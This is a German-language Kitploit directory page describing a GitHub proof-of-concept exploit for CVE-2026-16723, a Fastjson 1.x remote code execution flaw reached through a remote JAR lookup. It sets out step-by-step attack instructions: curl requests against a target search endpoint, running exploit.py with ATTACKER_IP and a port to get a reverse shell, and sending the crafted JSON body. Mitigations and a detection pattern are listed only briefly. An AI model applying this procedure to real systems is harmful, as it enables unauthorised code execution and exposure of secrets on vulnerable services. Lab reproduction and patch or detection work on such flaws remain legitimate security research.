Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-16723 — Proof-of-Concept-Exploit für CVE-2026-16723, eine Remote-Code-Execution-Schwachstelle in Fastjson 1.x @JSONType, mit einem Payload-JAR-Builder und einem Reverse-Shell-Listener. | Kitploit
Tools/GitHubGitHub/yym8538/cve-2026-16723
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubyym8538/cve-2026-16723

CVE-2026-16723

Proof-of-Concept-Exploit für CVE-2026-16723, eine Remote-Code-Execution-Schwachstelle in Fastjson 1.x @JSONType, mit einem Payload-JAR-Builder und einem Reverse-Shell-Listener.

Repository anzeigen
13vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Überblick

CVE-2026-16723 ist eine Remote Code Execution (RCE)-Schwachstelle in Fastjson 1.x (1.2.68 – 1.2.83). Wenn Fastjson vom Angreifer kontrolliertes JSON parst, wird ein manipulierter @type-Wert in einen Klassen-Ressourcen-Lookup innerhalb von checkAutoType umgewandelt. In einem ausführbaren Spring Boot Fat-JAR löst der Class Loader diesen Namen als jar:http://-URL auf und ruft ein entferntes JAR ab (SSRF), lädt dann eine Klasse, die die @JSONType-Annotation trägt, obwohl AutoType deaktiviert ist. Da ein modernes JDK / Tomcat den jar:http://-Binärnamen ablehnt, lädt die zuverlässige Variante das JAR in den JVM-Cache und liest es über jar:file:/proc/self/fd/N erneut ein, sodass die Klasse definiert wird und ihr statischer Initialisierer ausgeführt wird, was zur Codeausführung führt. AutoType bleibt deaktiviert und kein Classpath-Gadget ist erforderlich.


Betroffene Versionen

KategorieVersion
AnfälligFastjson 1.2.68 ≤ Version ≤ 1.2.83
GepatchtMigration zu Fastjson 2.x (kein korrigiertes 1.x-Release)

Auswirkung

  • Remote Code Execution als das Dienstkonto
  • Offenlegung von Secrets / Anmeldedaten vom Host und aus der Umgebung
  • Vollständige Kompromittierung der betroffenen Anwendung

Umgebung

Das Lab-Ziel ist ein öffentlicher Storefront (Northwind Store), dessen Such-API ihren Request-Body mit Fastjson bindet. Alles entspricht Fastjson's Standardeinstellungen: SafeMode aus, AutoType aus, verpackt als Spring Boot Fat-JAR.

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
VoraussetzungZustand in diesem Lab
Fastjson 1.2.68 – 1.2.831.2.83
Ausführbares Spring Boot Fat-JARja
Nicht authentifizierter JSON-Parse-PfadPOST /api/products/search
SafeMode / AutoTypeStandard (beide aus)

PoC

Der Angreifer und das Ziel laufen im selben Docker-Bridge-Netzwerk, sodass das Ziel den Angreifer als ausgehende Verbindung erreicht (kein zusätzlicher Port wird veröffentlicht).

Schritt 1. Bestätigen, dass das Ziel erreichbar ist

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Schritt 2. Den Exploit auf der Angreifer-Maschine ausführen

exploit.py erstellt das Payload-JAR, stellt es bereit, startet einen Listener und gibt den Request-Body aus. Nur die Callback-Adresse ist erforderlich.

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Schritt 3. Den Payload übermitteln

Fügen Sie den ausgegebenen Body in den Such-Endpunkt ein (Burp Repeater oder curl) und senden Sie ihn. Die Suchanfrage ist eine normale Funktion; nur ihr JSON-Body ist manipuliert.

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Schritt 4. Das Ergebnis bestätigen

Code läuft als das Dienstkonto. Rufen Sie das Flag über die erhaltene Shell ab:

whoami

Gegenmaßnahmen

  • Migration zu Fastjson 2.x
  • Oder com.alibaba:fastjson:1.2.83_noneautotype ausführen
  • Oder die JVM mit -Dfastjson.parser.safeMode=true starten
  • Erkennung: JSON @type-Werte, die jar:http oder jar:file / /proc/self/fd-Muster enthalten

Analyse

  • KR:
  • EN:
Tool herunterladen